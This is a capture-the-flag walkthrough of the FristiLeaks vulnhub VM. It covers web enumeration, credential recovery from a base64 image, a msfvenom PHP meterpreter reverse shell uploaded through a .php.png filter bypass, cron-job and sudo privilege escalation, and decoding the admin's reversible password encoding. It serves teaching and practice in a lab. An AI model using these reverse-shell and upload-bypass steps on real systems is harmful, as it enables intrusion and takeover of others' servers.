Let's leak
I picked this VM from vulnhub.com and booted it up in VirtualBox. From the site:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.
DISCLAIMER: This is a walkthrough, so the solutions will be visible; be warned. I will also try to explain every step in detail. I am no expert on this, I just really enjoy breaking this kind of stuff. So if you read any misuse of a tool's definition, please excuse my misconception.
With that out of the way let's begin.
Information gathering
Like any good pentest, let's gather as much information as we can on what we are attacking. I boot up the VM and find its IP address. From here we could do a typical nmap scan of the machine, but I'm willing to gamble that this box is hosting a website. Don't be fooled by my skipping nmap: it's best to scan everything, but I'm skipping it here. The landing page (migraine inducing) is what we see when we enter the site. Since this is a website, let's use Nikto. If you need more information on this tool there is an article here. In short, Nikto scans web servers for server configuration issues, outdated server software, and default or index files.
nikto -h http://192.168.1.17
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.17
+ Target Hostname:    192.168.1.17
+ Target Port:        80
+ Start Time:         2017-01-30 18:56:28 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: 0x524c0ef1d551d
+ The anti-clickjacking X-Frame-Options header is not present.
+ File/dir '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6545 items checked: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2017-01-30 18:56:39 (GMT-8) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The -h flag after nikto stands for host. Given our host's IP address, Nikto goes to town examining the site and shows us detailed information about the web server. What catches my eye is the /images directory, which has directory indexing enabled. Going there we find a simple listing with two images: one of the FristiLeaks logo, the other of Obi-Wan Kenobi. So our first hint is that there are other URLs on this web server. Reading further down the Nikto output we see that robots.txt lists three directories: /cola, /sisi and /beer. I went to all three and found nothing but Obi-Wan telling us what we already know. So now what? We can try to deduce what these names are hinting at. Let's guess some directory names, for instance /fristi... Bingo.
We are greeted with a lovely image of Nelson Muntz from the cartoon show The Simpsons, and what appears to be a login.
The attack!
I take a look at the source of the webpage. Sometimes the webpages source can lend us a hand in finding information for instance, the source on this page shows us a small message:
super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.
TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz
So we have two things to keep in mind. One, we might have a username (eezeepz), and two, an image has been encoded as base64 and inlined. We can see this by viewing the page source: the encoded image data is shown in a green font.
In my case I downloaded the image, which came down with an unknown file extension; I renamed it to .png and was able to view it. Now we need to decode the encoded data ourselves. Here is the command used:
echo 'iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BA....... gBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==' | base64 -D > download.png (for the sake of saving space I have removed some of the code)
The last few parts of this I will explain. First, | base64 pipes the string into the base64 tool. The -D flag tells the tool to decode (that is the macOS/BSD spelling; on Linux with GNU coreutils it is lowercase -d). The > redirects the output to a file, in this case our image download.png. I encourage you to read the man pages for these tools if this confuses you in any way. After this is decoded we get a different image this time:
Now we have another clue: this is either a username or a password. Let's try eezeepz as the username and keKkeKKeKKeKkEkkEk as the password. What do you know, we are able to log in with these credentials. Once we are in there is only one link available, an upload form, and the only file type it accepts is an image. So from here we are going to create a shell to upload to this site, specifically a PHP shell, using msfvenom:
sudo msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.9 lport=4444 -f raw > poop.php
So let's go through this command. Open a new terminal and call msfvenom, our tool (root is not actually required for it). The -p option selects the payload; we are using php/meterpreter/reverse_tcp, a meterpreter shell that connects back to us over TCP. Next we set our machine's IP address and a port for the shell to connect back to: lhost=<your IP> lport=<any port>. The -f option sets the output format; raw, because we want the bare PHP, and > writes it to filename.php. You can call this PHP shell anything you want!
In another terminal we need to start Metasploit, which we will use to listen for our shell. Type
msfconsole to fire up metasploit.
Then let's get ourselves a generic handler. Inside msf:
use multi/handler
The use command tells Metasploit to load a module; multi/handler is an empty handler that just waits for a connection. Next we load the same payload we built the PHP shell with:
set payload php/meterpreter/reverse_tcp
Now type show options to see what the payload needs: a listening host and a listening port. Use the same IP and port you gave msfvenom:
set LHOST 172.20.10.9
set LPORT 4444
Type exploit and Metasploit will listen on that address; once the uploaded shell connects back it gives us a meterpreter session. You should have Metasploit waiting like this:
[*] Started reverse TCP handler on 172.20.10.9:4444
[*] Starting the payload handler...
Minimize this terminal for now and let's go back to the webpage with the upload option.
Upload the PHP shell you created with msfvenom. Make sure it has .png (or any image extension) appended after .php. This works because the upload filter only looks at the final extension, while Apache's PHP handler on this box evidently matches .php anywhere in the filename, so poop.php.png still runs as PHP. Once it is uploaded we need to open it in the web browser. In my case it will be:
http://192.168.1.17/fristi/uploads/poop.php.png
After you go to this site, it should just continue loading. Check back at your metasploit session and you should now see a meterpreter session like below:
[*] Started reverse TCP handler on 172.20.10.9:4444
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 172.20.10.12
[*] Meterpreter session 1 opened (172.20.10.9:4444 -> 192.168.1.17:49044) at 2017-01-31 12:45:49 -0800
Let's see who is on this Apache server. We can use standard Linux commands in the meterpreter shell, so let's list the home directories:
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 Jan 31 15:36 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigo
When trying to change into the admin folder we find we can't: it is mode 700 and owned by admin, and we are running as the apache user. Let's see what our friend eezeepz has:
MAKEDEV chown hostname netreport taskset weak-modules
cbq clock hwclock netstat tc wipefs
cciss_id consoletype kbd_mode new-kernel-pkg telinit xfs_repair
cfdisk cpio kill nice touch ypdomainname
chcpu cryptsetup killall5 nisdomainname tracepath zcat
chgrp ctrlaltdel kpartx nologin tracepath6 zic
chkconfig cut nameif notes.txt true
chmod halt nano tar tune2fs
We can see some files here, including copies of well-known commands like chown, kill and nano. But I noticed a text file, notes.txt. Let's cat it and read what it says:
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
So this user doesn't have admin privileges, but the admin has set up a cron job that runs, with admin's privileges, whatever commands we put in /tmp/runthis, and has left a copy of chmod in /home/admin for us to use. We can use that to open up the admin home directory with this command:
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis
Within a minute the cron job runs our line, and we can change into the admin directory and list the files this user has:
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-rw-rw- 1 apache apache 35 Nov 23 14:32 runthis
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
We can see some interesting files. We should focus on the two text files and the Python script. cryptedpass.txt shows us: mVGZ3O3omkJLmy2pcuTq. The next file, cryptpass.py, shows this:
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
And the last file, whoisyourgodnow.txt: =RFn0AKnlMHMPIzpyuTI0ITG. Reading the Python script we can see that it base64-encodes its argument, reverses the result, and then applies rot13. So to undo it we apply the inverse steps in the opposite order: rot13 (which is its own inverse), reverse, then base64-decode. I needed to read around a bit to figure this out, but the decoder comes out as:
import codecs, sys

s = sys.argv[1]                           # the encoded string from the box
s = codecs.decode(s, 'rot13')             # rot13 is its own inverse
s = s[::-1]                               # undo the reversal
s = codecs.decode(s.encode(), 'base64')   # then base64-decode
print(s.decode())
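The full round trip, as an added Python 3 example that is not from the original post: the encoder from cryptpass.py re-implemented, its inverse, and a check that decoding and re-encoding agree on the two strings quoted above from the box.

```python
import base64
import codecs
import sys

def fristi_encode(plaintext: str) -> str:
    """Same transform as the admin's cryptpass.py: base64, reverse, rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")

def fristi_decode(token: str) -> str:
    """Undo it in reverse order: rot13 (self-inverse), reverse, base64-decode."""
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode()

# The two strings found on the box, as quoted in the post.
FOUND = ["mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"]

def decode_all(tokens=FOUND) -> dict:
    """Decode every token and confirm the encoder reproduces it exactly."""
    out = {}
    for tok in tokens:
        plain = fristi_decode(tok)
        assert fristi_encode(plain) == tok   # round trip must agree
        out[tok] = plain
    return out

if __name__ == "__main__":
    for tok, plain in decode_all(sys.argv[1:] or FOUND).items():
        print(f"{tok} -> {plain}")
```

The transform has no key, so calling the output "crypted" is optimistic; anything that looks like base64 but fails to decode is worth trying reversed, rot13'd, or both.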
Running our script with python poop.py "=RFn0AKnlMHMPIzpyuTI0ITG" gives us LetThereBeFristi!. Doing the same for the other encoded string gives thisisalsopw123. These could be passwords, so let's keep them in mind. The next step is to switch to fristigod, because this is our god now. su fristigod prompts for a password; let's use LetThereBeFristi!. We're in. Listing around, we find the folder /var/fristigod. We enter it and list:
-rw------- 1 fristigod fristigod .bash_history
drwxrwxr-x. 2 fristigod fristigod .secret_admin_stuff
Let's cat .bash_history, but we get nothing. So let's check what sudo will let this user do:
sudo -l -U fristigod
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
So fristigod may run doCom as the user fristi. Let's use it to get a shell:
sudo -u fristi .secret_admin_stuff/doCom /bin/sh
In the new shell:
id
cd /root
ls -la
cat fristileaks_secrets.txt
And read this:
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
this is the end...
This was a really fun little VM. But I didn't do it in under 4 hours, as I was working on it between work and my spare time. Still, I don't believe I would have gotten it done in under 4 hours even without distractions; with all the research I needed to do while stuck on a few things, that would have been impossible. I feel like I need to practice a ton more. Reading other walkthroughs, I definitely feel I have much more to grow.